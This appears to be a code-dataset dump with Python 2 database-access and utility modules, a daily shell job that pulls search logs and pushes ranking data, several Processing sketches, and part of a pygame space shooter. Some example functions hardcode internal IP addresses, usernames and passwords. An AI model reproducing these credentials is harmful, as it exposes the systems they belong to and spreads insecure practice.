fetchone(self):\n\t\t'''\n\t\t\t没什么,就是fetchone\n\t\t'''\n\t\tif not self.cursor:\n\t\t\traise NameError, 'self.cursor is not defined!'\n\t\tresult = []\n\t\tif self.conn_str[0] == 'mssql':\n\t\t\tresult = self.cursor.fetchone()\n\t\t\tself.rowcount = self.cursor.rowcount\n\n\t\tif self.conn_str[0] == 'mysql':\n\t\t\tresult = self.cursor.fetchone()\n\t\t\tself.rowcount += 1\n\n\t\tif self.conn_str[0] == 'oracle':\n\t\t\tresult = self.cursor.fetchone()\n\t\t\tself.rowcount = self.cursor.rowcount\n\n\t\tif self.conn_str[0] == 'hive':\n\t\t\ttry:\n\t\t\t\trow = self.cursor.fetchOne()\n\t\t\t\tif len(row) <= 0:\n\t\t\t\t\treturn result\n\t\t\t\tresult = row.split('\\t')\n\t\t\t\tself.rowcount += 1\n\t\t\texcept Thrift.TException, tx:\n\t\t\t\tself.close()\n\t\t\t\tsys.stderr.write('%s\\n' % (tx))\n\t\t\t\traise SystemError, tx\n\t\treturn result\n\n\n\tdef fetchall(self):\n\t\t'''\n\t\t\t没什么,就是fetchall\n\t\t'''\n\t\tif not self.cursor:\n\t\t\traise NameError, 'self.cursor is not defined!'\n\t\tresult = []\n\t\tif self.conn_str[0] == 'mssql':\n\t\t\tresult = self.cursor.fetchall()\n\t\t\tself.rowcount = self.cursor.rowcount\n\t\t\n\t\tif self.conn_str[0] == 'mysql':\n\t\t\tresult = self.cursor.fetchall()\n\t\t\tself.rowcount = len(result)\n\n\t\tif self.conn_str[0] == 'oracle':\n\t\t\tresult = self.cursor.fetchall()\n\t\t\tself.rowcount = self.cursor.rowcount\n\n\t\tif self.conn_str[0] == 'hive':\n\t\t\ttry:\n\t\t\t\trows = self.cursor.fetchAll()\n\t\t\t\tif len(rows) <= 0:\n\t\t\t\t\treturn result\n\t\t\t\tfor row in rows:\n\t\t\t\t\tlist = row.split('\\t')\n\t\t\t\t\tresult.append(list)\n\t\t\t\tself.rowcount = len(rows)\n\t\t\texcept Thrift.TException, tx:\n\t\t\t\tself.close()\n\t\t\t\tsys.stderr.write('%s\\n' % (tx))\n\t\t\t\traise SystemError, tx\n\t\treturn result\n\n\n\tdef rows_affected(self):\n\t\t'''\n\t\t\t返回影响行数(整数)\n\t\t'''\n\t\treturn self.rowcount\n\n\n\tdef to_str(self,field):\n\t\tif field in ['',\"''\",None]:\n\t\t\tfield = '\"\"'\n\t\tif self.conn_str[0] in ['mysql','mssql']:\n\t\t\tfield = unicode(field)\n\t\tif self.conn_str[0] == 'oracle':\n\t\t\tfield = str(field)\n\t\tif self.conn_str[0] == 'hive':\n\t\t\tpass\n\t\treturn field\n\n\n\tdef data_filter(self,field):\n\t\t'''\n\t\t\t数据清洗,不要直接调用\n\t\t'''\n\t\tif field in [None,'','\"',\"'\",\"''\"]:\n\t\t\tfield = '\"\"'\n\t\telse:\n\t\t\t#从db拿到的数据有各种类型,要统一转成字符串\n\t\t\tif self.conn_str[0] in ['mysql','mssql']:\n\t\t\t\tfield = unicode(field)\n\t\t\tif self.conn_str[0] in ['oracle']:\n\t\t\t\tfield = str(field)\n\t\t\t#从hive拿到的数据本身是字符串,不用转\n\t\t\tif self.conn_str[0] == 'hive':\n\t\t\t\tpass\n\t\t\t#不将双引号本身转义\n\t\t\tif len(field) >= 3:\n\t\t\t\tfield = field.replace('\"','')\n\t\t\t\tfield = field.replace(\"'\",'')\n\n\t\t\t#控制字符过滤\n\t\t\t#ctrl + A/a --- ctrl + Z/z\n\t\t\tfield = re.sub(r'\\x01|\\x02|\\x03|\\x08|\\x09|\\x0A|\\x0B|\\x0C|\\x0D|\\x1B|\\x1C|\\x1D|\\x1E|\\x1F|\\\\', \n\t\t\t\t\t\t\t'', field)\n\t\treturn field\n\n\n\tdef close(self):\n\t\t'''\n\t\t\t关闭DataObject连接\n\t\t'''\n\t\tif self.conn:\n\t\t\tself.close_cursor()\n\t\t\tself.conn.close()\n\t\tself.rowcount = 0\n\t\tself.conn = None\n \n\n\tdef disconnect(self):\n\t\t'''\n\t\t\tclose的向下兼容版本\n\t\t'''\n\t\tself.close()\n\n\n\tdef __del__(self):\n\t\t'''\n\t\t\t析构函数, 回收连接相关资源\n\t\t'''\n\t\tself.close()\n\n\n\ndef hive_exmp():\n\t'''\n\t\t我们的21集群没权限系统,所以无用户名和密码形参\n\t'''\n\tconn = DataObject.Connect(dbtype='hive', host='localhost', port=10010)\n\tconn.execute('use addr')\n\tconn.execute('select * from user_addr_in_order limit 2')\n\tfor row in conn.fetchall():\n\t\tprint '\\t'.join(map(str, row))\n\tconn.close()\n\n\ndef mysql_exmp():\n\t'''\n\t\tdbtype, host, user, password, port是必填项\n\t'''\n\tconn = DataObject.Connect(dbtype='mysql', host='10.255.253.16', user='readuser', password='ru@r&d', \\\n\t\t\t\t\t\t\t port=3306, database='AntiFraud', charset='utf8')\n\tconn.execute('show tables')\n\tfor row in conn.fetchall():\n\t\tprint '\\t'.join(map(str, row))\n\tconn.close()\n\n\ndef oracle_exmp():\n\t'''\n\t\t要求使用dsn去连接oracle\n\t\tdbtype, dsn, user, password是必填项\n\t'''\n\tconn = DataObject.Connect(dbtype='oracle', dsn='reportstaging.idc2:1521/staging1', user='v_stage', \\\n\t\t\t\t\t\t\t password='v_stage') \n\tconn.execute('select table_name from user_tables')\n\tfor row in conn.fetchall():\n\t\tprint '\\t'.join(map(str, row))\n\tconn.close()\n\n\ndef sqlserver_exmp():\n\t'''\n\t\tdbtype, host, user, password, port是必填项\n\t'''\n\tconn = DataObject.Connect(dbtype='mssql', host='172.16.128.86', user='readuser', password='password', port=1433, \\\n\t\t\t\t\t\t\t database='customer', charset='utf8')\n\tconn.execute('select top(2) * from customers')\n\tfor row in conn.fetchall():\n\t\tprint '\\t'.join(map(str, row))\n\tconn.close()\n\n\ndef main():\n\tprint '由于连接或端口限制,以下所有例子,只保证在21上执行成功'\n\tprint '************ hive example **************'\n\thive_exmp()\n\tprint '************ mysql example *************'\n\tmysql_exmp()\n\tprint '************ oracle example ************'\n\toracle_exmp()\n\tprint '************ sqlserver example *********'\n\tsqlserver_exmp()\n\tprint '***************** end ******************'\n\n\nif __name__ == '__main__':\n\tmain()\n" }, { "alpha_fraction": 0.6483445763587952, "alphanum_fraction": 0.6518804430961609, "avg_line_length": 20.163265228271484, "blob_id": "4c57f45a29ab1cd00d7b32ca991e7d9434ef7bbf", "content_id": "d9180a69f5c57ccd6598766ec9dd16ec6828865a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3259, "license_type": "no_license", "max_line_length": 110, "num_lines": 147, "path": "/lib/base_lib.py", "repo_name": "magicbupt/ltr_feartures_compute_job", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n#encoding:utf-8\n\n##Author:maorui\n##Date :2012-08-30\n##File :base_lib.py\n##comment:基础类库用于封装一些简单的功能\n##\t\t\n\t\t\nimport sys\nimport os\nfrom ConfigParser import RawConfigParser\nfrom ConfigParser import *\nfrom getopt import getopt\nimport logging\nimport logging.config\nimport time\nimport datetime\nimport socket\t\t\t\t\nimport struct\n\nfrom data_access_object import DataObject\nfrom db_factory import DBFactory\nfrom Joblog import Joblog\nfrom mail_sender import MailSender\n\ndef get_path():\n\t\n\t\"\"\"\n\tget opt parameter\n\t\"\"\"\n\tpath =''\n\ttry:\n\t\topts, val = getopt(sys.argv[1:], 'c:', ['path='])\n\t\tconf_path = ''\n\t\tfor opt, var in opts:\n\t\t\tif opt in ['-c']:\n\t\t\t\tconf_path = var\n\t\t\tif opt in ['--path']:\n\t\t\t\tconf_path = var\n\t\tif not os.path.exists(conf_path):\n\t\t\traise Exception,'the path is not existence'\n\texcept Exception,ex:\n\t\traise Exception,ex\n\n\treturn conf_path \n\n\n\nclass BaseLib(object):\n\n\tdef __init__(self,conf_path):\n\t \n\t\t'''\n\t\t初始化配置文件和日志文件\n\t\t'''\n\t\tself.connfile = '%s/conf/connect.cfg' % (conf_path)\n\t\tself.sqlfile = '%s/conf/sql.cfg' % (conf_path)\n\t\t\n\t\tself.config = RawConfigParser()\n\t\tself.config.read(self.connfile)\n\t\tself.sqlsets = RawConfigParser()\n\t\tself.sqlsets.read(self.sqlfile)\n\t\n\tdef connect_db(self,section = ''):\n\t\t\"\"\"\n\t\t主要用于连接数据库,并返回连接对象\n\t\t\"\"\"\n\t\tsection = section.strip(' ')\n\t\ttry:\n\t\t\tdbtype = self.config.get(section,'dbtype')\n\t\t\thost = self.config.get(section,'host')\n\t\t\tuser = self.config.get(section,'user')\n\t\t\tpassword = self.config.get(section,'password')\n\t\t\tport = self.config.get(section,'port')\n\t\t\tdatabase = self.config.get(section,'database')\n\t\texcept: \n\t\t\traise Exception, 'get %s date error' % (section)\n\t\ttry:\n\t\t\tsql_conn = DBFactory.Connect(dbtype = dbtype,host = host,database = database,charset = 'utf8',user = user,\\\n\t\t\t\t\t\t\t password = password,port = port)\n\t\t\tsql_conn.get_cursor()\n\t\texcept:\n\t\t\traise Exception, 'connect databse under %s error' % (section)\n\t\treturn sql_conn\n\t\n\tdef get_sql(self,section = '',option = ''):\n\t\t'''\n\t\t获取配置文件中的sql语句\n\t\t'''\n\t\tsql = ''\n\t\tsection = section.strip(' ')\n\t\toption = option.strip('')\n\t\ttry:\n\t\t\tsql = self.sqlsets.get(section, option)\n\t\texcept: \n\t\t\traise Exception, 'get sql under %s %s error' % (section,option)\n\t\treturn sql\n\n\tdef get_monitor(self,title = ''):\n\t\t\"\"\"\n\t\tget monitor object\n\t\t\"\"\"\n\t\tjoblog = None\n\t\ttitle = title.strip(' ')\n\n\t\ttry: \n\t\t\thost = self.config.get(title, 'host')\n\t\t\tuid\t= self.config.get(title, 'user')\n\t\t\tpwd\t= self.config.get(title, 'password')\n\t\t\tdb\t = self.config.get(title, 'database')\n\t\t\tjoblog = Joblog(host, uid, pwd, db)\n\t\t\t\n\t\texcept Exception, ex: \n\t\t\treturn \n\n\t\treturn joblog\n\n\tdef send_mail(self,title, content):\n\t\t'''\n\t\t出现异常是发送邮件报告\n\t\t'''\n\t\t#初始化邮件发送对象\n\n\t\temail = MailSender()\n\t\ttry:\n\t\t\temail_to = self.config.get('email','receiver')\n\t\t\temail_receivers = email_to.split(';')\n\t\t\temail.sendMail(email_receivers,title, str(content))\n\t\texcept Exception, ex: \n\t\t\treturn \n\n\n\n\ndef test():\n\tpath = get_path()\n\tprint path\n\n\tobj = BaseLib(path)\n\t\n\tsql_conn = obj.connect_db('connect_mysql')\n\tsql = obj.get_sql('SELECT','get_region_list')\n\tsql_conn.execute(sql)\n\nif __name__ == '__main__':\n\ttest()\n" }, { "alpha_fraction": 0.6517386436462402, "alphanum_fraction": 0.692307710647583, "avg_line_length": 22.14634132385254, "blob_id": "3af4098962779133eb61e0afe57031df26ce56d3", "content_id": "d260fa815785a8ae7b4659de5ace020f40ea199c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1898, "license_type": "no_license", "max_line_length": 105, "num_lines": 82, "path": "/bin/everyday_job.sh", "repo_name": "magicbupt/ltr_feartures_compute_job", "src_encoding": "UTF-8", "text": "#!/bin/sh\nPYTHON=/usr/local/bin/python\n\nwork_path=\"/d2/caiting/search_ranking/ltr_feartures_compute_job\"\n\ndata_url=\"http://192.168.197.151:9030/joblog/data/\" \nclick_url=\"http://192.168.197.151:9030/joblog/click/detail/\"\nuv_url=\"http://192.168.197.176:9030/joblog/data/\"\n\nsearch_lastday=$(date -d yesterday +%Y%m%d)\nuv_lastday=$(date -d yesterday +%Y-%m-%d)\n\nsearch_log=log\\-$search_lastday\\_search.clean.tar.bz2\nclick_log=search\\-${search_lastday:2:8}\nday_uv_log=uv_d_$uv_lastday\nweek_uv_log=uv_w_$uv_lastday\nmonth_uv_log=uv_m_$uv_lastday\n\necho $search_lastday\n\n# load search log data from url \necho \"load show, click and uv data from url ...\"\nif [ $? -eq 0 ];then\n\tcd $work_path/data/temp_data\n\twget $data_url$search_log\n\twget $click_url$click_log\n\twget $uv_url$day_uv_log\n\twget $uv_url$week_uv_log\n\twget $uv_url$month_uv_log\n\ttar -jxvf $search_log && rm -f *.tar.*\nelse\n\texit -1\nfi\n\n\n#get each feature from mysql\necho \"load product info from db and init search_log data ...\"\nif [ $? -eq 0 ];then\n\tcd $work_path/bin\n\t$PYTHON main.py \nelse\n\texit -2\nfi \n\n# caculate ctr for each pid\necho \"caculate ctr ...\"\nif [ $? -eq 0 ];then\n\tcd $work_path/bin\n\t$PYTHON caculate_features_for_model.py $search_lastday\nelse\n\texit -3\nfi\n\n# change data to static_hashmap and then send to online search_engine\necho \"change pid_ctr file to statichashmap and scp to search server...\"\nif [ $? -eq 0 ];then\n\t./map2hashmap\n\tscp ../data/pid2rankvalue [email protected]:/home/search/caiting/search_test/modules/search_ranking/\nelse\n\texit -4\nfi\n \n\n# clear the search_log data\necho \"clean temp_data/* ...\"\nif [ $? -eq 0 ];then\n\t#cd $work_path/data && rm -f product_info_$uv_lastday \n\tcd $work_path/data/temp_data/ && rm -f *\nelse\n\texit -5\nfi\n\n#save data for thrift server\necho \"thrift data saving ...\"\nif [ $? -eq 0 ];then\n\tcd $work_path/bin\n\t$PYTHON set_thrift_server_data.py $search_lastday\nelse\n\texit -6\nfi\n\necho \"ok !\"\n" } ]
13
shiinaL/Python
https://github.com/shiinaL/Python
fd3c7808bebdac9514e9cbd94a231cb4acc6dc2f
d1240daccdfa5af3d9b255919dc43bd444aaf717
00fd0bd427414e08258403187c7d9d11b34c62a7
refs/heads/master
2020-04-22T21:02:41.234302
2019-02-14T09:23:17
2019-02-14T09:23:17
170,660,629
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.47109469771385193, "alphanum_fraction": 0.505945086479187, "avg_line_length": 12.042780876159668, "blob_id": "308c474e2d07f16607229e392dcb871006eb9a4b", "content_id": "7ebe63f5acdc2d6469efa60c795206fb60f7d470", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2679, "license_type": "no_license", "max_line_length": 61, "num_lines": 187, "path": "/1211.py", "repo_name": "shiinaL/Python", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n# 输入打印\n# s = input('input your birthday:')\n# birthday = int(s)\n# if birthday <20:\n# \tprint('hello',birthday)\n# else:\n# \tprint('hi',birthday)\n\n# 数据列表的使用\n# list\nlist_a = [1, False, '123', [1, 2]]\n# 添加\nlist_a.append(9)\nprint(list_a)\n# 删除\nlist_a.pop()\nprint(list_a)\nlist_a.pop(0)\nprint(list_a)\n# 修改\nlist_a[0] = True\nprint(list_a)\nlist_a.insert(1, 998)\nprint(list_a)\n# 查询\nprint(list_a[1])\n\n# tuple\ntuple_a = ('司马光', '祖冲之', '魏延')\n# 查询\nprint(tuple_a[0])\n\n# 条件判断\nage = 19\nif age > 18:\n print('你已成年')\n\n# 循环\nfor n in range(0, 10):\n if(n > 5):\n break\n print(n)\n\nfor n in range(0, 10):\n if(n % 2 == 0):\n continue\n print(n)\n\n# 字典的使用\n# dist\ndist_a = {'a': 1, 'b': 2, 'c': 3}\n# 添加\ndist_a['d'] = 4\nprint(dist_a)\n# 删除\ndist_a.pop('d')\nprint(dist_a)\n# 修改\ndist_a['a'] = 9\nprint(dist_a)\n# 查询\nprint(dist_a['c'])\n\n# set\nset_a = set([1, 2, 3, 'a'])\nprint(set_a)\n# 添加\nset_a.add(3)\nset_a.add(4)\nprint(set_a)\n# 删除\nset_a.remove('a')\nprint(set_a)\n\n# 函数\n# 绝对值\nprint(abs(-99))\n\n# 给函数设置别名\nf = float\nprint(f(\"11.22\"))\n\n# 自定义函数\n\n\ndef my_abs(x):\n if not isinstance(x, (float, int)):\n raise TypeError(\"bad operand type\")\n if x >= 0:\n return x\n else:\n return -x\n# my_abs('123d')\n\n# 函数关键字参数\n\n\ndef person(name, age, **kw):\n if \"city\" in kw:\n print(\"city=\"+kw[\"city\"])\n print({\"name\": name, \"age\": age, \"other\": kw})\n\n\n# 函数调用\nperson(\"li\", 12, gender=\"F\", id=\"89757\", city=\"dali\")\n\n# 递归函数\n\n\ndef fetch(x):\n if x == 1:\n return 1\n else:\n return x*fetch(x-1)\n\n\n# 调用\nprint(fetch(5))\n\n\ndef fach(n):\n return fach_fach(n, 1)\n\n\ndef fach_fach(n, p):\n if n == 1:\n return p\n else:\n return fach_fach(n-1, n*p)\n\n\nprint(fach(5))\n\n\n# 去除字符首尾空格\ndef trim(s):\n if s == \"\":\n return s\n if s[0] == \" \":\n s = s[1:]\n return trim(s)\n if s[-1] == \" \":\n s = s[:-1]\n return trim(s)\n return s\n\n# 查找list中的最小和最大值\n\n\ndef findMinAndMax(L):\n if L == []:\n return (None, None)\n\n a = L[0]\n b = L[0]\n\n for n in L:\n if a > n:\n a = n\n if b < n:\n b = n\n\n return a, b\n\n\n# 列表生成式\nL1 = ['Hello', 'World', 18, 'Apple', None]\n\nL2 = [s.lower() for s in L1 if isinstance(s, str)]\n\nprint(L2)\n\n\n#生成器 杨辉三角\ndef triangles():\n\tL = [1]\n\twhile True:\n\t\tyield L\n\t\tL = [1] + [L[i - 1] + L[i] for i in range(1, len(L))] + [1]\n\n\nfor i,n in enumerate(triangles()):\n\t# if i == 10:\n\t# \tbreak\n\tprint(n)\n" } ]
1
NikolajChuguev/12345
https://github.com/NikolajChuguev/12345
bc8eda2fabd8a5b4a18c45431ff57fd51dd0ffd1
d797b57922cffe4ccbc6d582422a71421bffc1da
ea30e26ed125b86fcda7ca49ffad72c8d5faf130
refs/heads/main
2023-02-03T10:55:15.096998
2020-12-21T19:28:22
2020-12-21T19:28:22
306,263,672
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4521963894367218, "alphanum_fraction": 0.5813953280448914, "avg_line_length": 19.5, "blob_id": "f18fec8223fbe4e11f063ea8136fc549715947de", "content_id": "098d34c0f58e6c9abb92d347ad7b242cd95a2391", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 387, "license_type": "no_license", "max_line_length": 63, "num_lines": 18, "path": "/sketch_201203a.pyde", "repo_name": "NikolajChuguev/12345", "src_encoding": "UTF-8", "text": "colorr=0\r\ncolorg=0\r\ncolorb=0\r\ndef setup():\r\n size (1000,1000)\r\n background(0)\r\ndef draw(): \r\n global colorr,colorg,colorb\r\n if mouseX>450 and mouseY>450 and mouseY<550 and mouseX<550:\r\n colorr=255\r\n colorg=0\r\n colorb=0\r\n else :\r\n colorr=255\r\n colorg=255\r\n colorb=255\r\n fill(colorr,colorg,colorb)\r\n ellipse(500,500,100,100)\r\n" }, { "alpha_fraction": 0.38790035247802734, "alphanum_fraction": 0.46975088119506836, "avg_line_length": 13.61111068725586, "blob_id": "a68fbec03107a2de3682378b58a0f1749e67bf9b", "content_id": "67d0eb0aaf7071aa2bdeb4a0f04d9443a69c5a6a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 281, "license_type": "no_license", "max_line_length": 40, "num_lines": 18, "path": "/sketch_201119c.pyde", "repo_name": "NikolajChuguev/12345", "src_encoding": "UTF-8", "text": "x, y = 0, 0\r\ndim = 80.0\r\n\r\ndef setup():\r\n size(640, 360)\r\n noStroke()\r\n\r\ndef draw():\r\n global x, y\r\n background(102)\r\n\r\n x = x + 0.8\r\n if x > width + dim:\r\n x = -dim\r\n\r\n translate(x, height / 2 - dim / 2)\r\n fill(255)\r\n ellipse(-dim / 2, -dim / 2, dim, dim)\r\n" }, { "alpha_fraction": 0.2982456088066101, "alphanum_fraction": 0.3711200952529907, "avg_line_length": 25.037036895751953, "blob_id": "fc0a56538067a79f6dcdb5351336ee6822e70c00", "content_id": "7be9e7157dabf97500454ef2980817af504b85b4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 741, "license_type": "no_license", "max_line_length": 52, "num_lines": 27, "path": "/sketch_201112a.pyde", "repo_name": "NikolajChuguev/12345", "src_encoding": "UTF-8", "text": "width = height = 1000\r\nny = 6\r\nnx = 6\r\nl = 100\r\nvar = 0\r\ndef setup(): \r\n size(width, height)\r\n stroke(0,128,0)\r\n noFill()\r\n frameRate(4) \r\ndef draw():\r\n global var \r\n background(192,192,192)\r\n for i in range(ny):\r\n for k in range(nx):\r\n x = ((k+1)*width/nx)-((width/nx)/2)\r\n y = ((i+1)*height/ny)-((height/ny)/2)\r\n if var == 0 :\r\n line(x, y-(l/2), x, y+(l/2))\r\n if var == 1 :\r\n rect(x-l/2, y-l/2, l, l)\r\n fill(255,255,0) \r\n if var == 2 :\r\n ellipse(x, y, l, l)\r\n fill(255,204,0) \r\n if frameCount %1 == 0 :\r\n var = (var+1)%3 \r\n \r\n" }, { "alpha_fraction": 0.3639344274997711, "alphanum_fraction": 0.4721311330795288, "avg_line_length": 16.484848022460938, "blob_id": "6d3a50923d4206fa23aa00aa96476a97edf34cb7", "content_id": "5eae96dd2889c231a30656c2a4999e0951484a5e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 610, "license_type": "no_license", "max_line_length": 55, "num_lines": 33, "path": "/sketch_26_11__3.pyde", "repo_name": "NikolajChuguev/12345", "src_encoding": "UTF-8", "text": "x=1000\r\ny=1000\r\nx1=x/2\r\ny1=y/2\r\nspeed=5\r\n\r\ndef setup() :\r\n size(x,y)\r\n fill(0)\r\n\r\ndef keyPressed():\r\n global x1,y1\r\n if key == 'w':\r\n y1 = y1-speed\r\n if key == 's':\r\n y1 = y1+speed\r\n if key == 'a':\r\n x1 = x1-speed\r\n if key == 'd':\r\n x1 = x1+speed\r\ndef keyReleased():\r\n global x,y,x1,y1\r\n if key == ' ':\r\n x1 = random (0,x)\r\n y1 = random (0,y)\r\n background(255)\r\n ellipse(x1,y1,100,100) \r\n fill(random(0,255),random(0,255),random(0,255))\r\n\r\ndef draw():\r\n global x1,y1\r\n background(255)\r\n ellipse(x1,y1,100,100)\r\n" }, { "alpha_fraction": 0.42975205183029175, "alphanum_fraction": 0.5785123705863953, "avg_line_length": 15.285714149475098, "blob_id": "8a8c0f3596f809f5a284406a2e4a6e8f2192c62d", "content_id": "6c03c893e6a80541c3f14599f1ff22de0e32ca17", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 121, "license_type": "no_license", "max_line_length": 34, "num_lines": 7, "path": "/sketch_201126a.pyde", "repo_name": "NikolajChuguev/12345", "src_encoding": "UTF-8", "text": "def setup() :\r\n size(1000,1000)\r\n fill(0)\r\n\r\ndef draw():\r\n background(255)\r\n ellipse(mouseX,mouseY,100,100)\r\n" } ]
5
BYTEic/AstroAttack
https://github.com/BYTEic/AstroAttack
96883b65ea08c9a7d4c4c2b083d38f8691843ce5
9e535c55adf62e330c0084e1c490140fa98085bd
29242bffa158d10ed3d167805259461941b6c828
refs/heads/master
2020-12-04T06:03:56.666171
2020-01-03T19:04:59
2020-01-03T19:04:59
231,646,859
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.7857142686843872, "alphanum_fraction": 0.7857142686843872, "avg_line_length": 13, "blob_id": "e7c651dc296412a59f9ec73a992f1b676e047111", "content_id": "a905b8861f065de2b59ca42cb171cf9599b04ebb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 28, "license_type": "no_license", "max_line_length": 13, "num_lines": 2, "path": "/Astro Atack!/README.md", "repo_name": "BYTEic/AstroAttack", "src_encoding": "UTF-8", "text": "# AstroAttack\n# AstroAttack\n" }, { "alpha_fraction": 0.608639121055603, "alphanum_fraction": 0.6375325322151184, "avg_line_length": 24.521072387695312, "blob_id": "37d432502abaeec01bd7e9194c13fd87c55ae3c7", "content_id": "775d6d5824289018bc4f77fbff8e67454658bd9d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6990, "license_type": "no_license", "max_line_length": 147, "num_lines": 261, "path": "/Astro Atack!/main_game.py", "repo_name": "BYTEic/AstroAttack", "src_encoding": "UTF-8", "text": "import pygame\r\nimport random\r\ntry:\r\n pygame.joystick.init()\r\nexcept:\r\n pass\r\ndef getscores(row):\r\n config = open('hightscores.txt','r')\r\n lines = config.read().splitlines()\r\n return lines[row]\r\ndef setscores(lines):\r\n\twith open(\"hightscores.txt\", \"w\") as file:\r\n\t\tfor line in lines:\r\n\t\t\tfile.write(line + '\\n')\r\nwindow_size_x = 500\r\nwindow_size_y = 500\r\npygame.mixer.init(frequency=44100, size=-16, channels=1, buffer=4096)\r\npygame.init()\r\ngame = pygame.display.set_mode((window_size_x,window_size_y))\r\npygame.display.set_caption(\"Astro attack!\")\r\ngameover = False\r\nx = (500//2)-(32//2)\r\ny = 450\r\nwidth = 32\r\nheight = 32\r\nspeed = 5\r\nticks = 30\r\nrun = True\r\nleft = False\r\nright = False\r\nup = False\r\ndown = False\r\nlevel = 0\r\nbackX = 0\r\nbackY = -500\r\nlives_int = 3\r\n\r\nbullets = []\r\ndummies = []\r\n\r\nboom_sprite = pygame.image.load('sprites/boom.bmp')\r\n\r\nclass bullet_obj():\r\n\tdef __init__(self,x,y,facing,radius,color):\r\n\t\tself.x = x\r\n\t\tself.y = y\r\n\t\tself.facing = facing\r\n\t\tself.vel = 8 * facing\r\n\t\tself.radius = radius\r\n\t\tself.color = color\r\n\tdef draw(self, game):\r\n\t\tpygame.draw.circle(game,self.color, (self.x,self.y),self.radius)\r\n\r\nclass dummie_obj():\r\n\tdef __init__(self,x,y):\r\n\t\tself.x = x\r\n\t\tself.y = y\r\n\t\tself.vel = 2\r\n\tdef draw(self, game):\r\n\t\tgame.blit(dummie,(self.x,self.y))\r\n\tdef isCollide(self,x,y,width,height):\r\n\t\tif (self.x < (x + width) and (self.x + 32) > x and self.y < (y + height) and (32 + self.y) > y):\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\treturn False\r\n\tdef boom(self,game):\r\n\t\tgame.blit(boom_sprite,(self.x,self.y))\r\n\t\tpygame.display.update()\r\n\r\nscore_hud = pygame.image.load('score_hud.bmp')\r\n\r\nlives_hud = pygame.image.load('Lives_hud.bmp')\r\n\r\nRightFrame = pygame.image.load('sprites/right.bmp')\r\n\r\nLeftFrame = pygame.image.load('sprites/left.bmp')\r\n\r\nForwardFrame = pygame.image.load('sprites/up.bmp')\r\n\r\nBackwardFrame = pygame.image.load('sprites/down.bmp')\r\n\r\nIDLEframe = pygame.image.load('sprites/SpaceShip1.bmp')\r\n\r\nbackground = pygame.image.load('space.bmp')\r\n\r\ndummie = pygame.image.load('sprites/SpaceShip2.bmp')\r\nchance_dummie_do_not_spawn = 0.9\r\nbasis33 = pygame.font.Font('basis33.ttf',50)\r\nscore_int = 0\r\nclock = pygame.time.Clock()\r\nscore_ = basis33.render(str(score_int), False, (0,0,250))\r\nlives_ = basis33.render(str(lives_int), False, (200,0,0))\r\nscore_RectObj = score_.get_rect()\r\nscore_RectObj.center = (140, 18)\r\nmusic = 0\r\nj_check = True\r\n\r\npygame.mixer.music.load(\"sounds/m1.wav\")\r\ndef update_window():\r\n\tglobal chance_dummie_do_not_spawn\r\n\tglobal music\r\n\tglobal backX\r\n\tglobal backY\r\n\tglobal score_RectObj\r\n\tchance_dummie_do_not_spawn -= 0.0000001\r\n\tgame.blit(background,(backX,backY))\r\n\tif music == 0:\r\n\t\tpygame.mixer.music.play(99999999,0)\r\n\tif music == 9100:\r\n\t\tmusic = -1\r\n\tmusic += 1\r\n\r\n\tbackY += 0.5\r\n\tif backY == 1:\r\n\t\tbackY = -500\r\n\tfor bullet in bullets:\r\n\t\tbullet.draw(game)\r\n\tfor dummie_ in dummies:\r\n\t\tdummie_.draw(game)\r\n\tif left:\r\n\t\tgame.blit(LeftFrame,(x,y))\r\n\telif right:\r\n\t\tgame.blit(RightFrame,(x,y))\r\n\telif up:\r\n\t\tgame.blit(ForwardFrame,(x,y))\r\n\telif down:\r\n\t\tgame.blit(BackwardFrame,(x,y))\r\n\telse:\r\n\t\tgame.blit(IDLEframe,(x,y))\r\n\tscore_ = basis33.render(str(score_int), True, (0,0,250))\r\n\tlives_ = basis33.render(str(lives_int), False, (200,0,0))\r\n\tgame.blit(lives_, (480,-5))\r\n\tgame.blit(lives_hud,(350,0))\r\n\tgame.blit(score_, score_RectObj)\r\n\tgame.blit(score_hud,(0,0))\r\n\tclock.tick(ticks)\r\n\tpygame.display.update()\r\n\r\nwhile run == True:\r\n\tif j_check:\r\n\t\ttry:\r\n\t\t\tJ_but0 = joystick.get_button(0)\r\n\t\t\tJ_but1 = joystick.get_button(1)\r\n\t\texcept:\r\n\t\t\tJ_but0 = False\r\n\t\t\tJ_but1 = False\r\n\t\t\tj_check = False\r\n\tkeys = pygame.key.get_pressed()\r\n\tjoystick_count = pygame.joystick.get_count()\r\n\tfor i in range(joystick_count):\r\n\t\tjoystick = pygame.joystick.Joystick(i)\r\n\t\tjoystick.init()\r\n\t\t# Get the name from the OS for the controller/joystick\r\n\t\tname = joystick.get_name()\r\n\t\t# Usually axis run in pairs, up/down for one, and left/right for\r\n\t\t# the other.\r\n\t\taxes = joystick.get_numaxes()\r\n\t\tfor i in range(axes):\r\n\t\t\taxis = joystick.get_axis(i)\r\n\r\n\t\tbuttons = joystick.get_numbuttons()\r\n\r\n\t\tfor i in range(buttons):\r\n\t\t\tbutton = joystick.get_button(i)\r\n\t\t\t#if button[pygame.j]\r\n\r\n\t\t# Hat switch. All or nothing for direction, not like joysticks.\r\n\t\t# Value comes back in an array.\r\n\t\thats = joystick.get_numhats()\r\n\r\n\r\n\t\tfor i in range(hats):\r\n\t\t\that = joystick.get_hat(i)\r\n\thoriz_axis_pos= round(joystick.get_axis(0))\r\n\tvert_axis_pos= 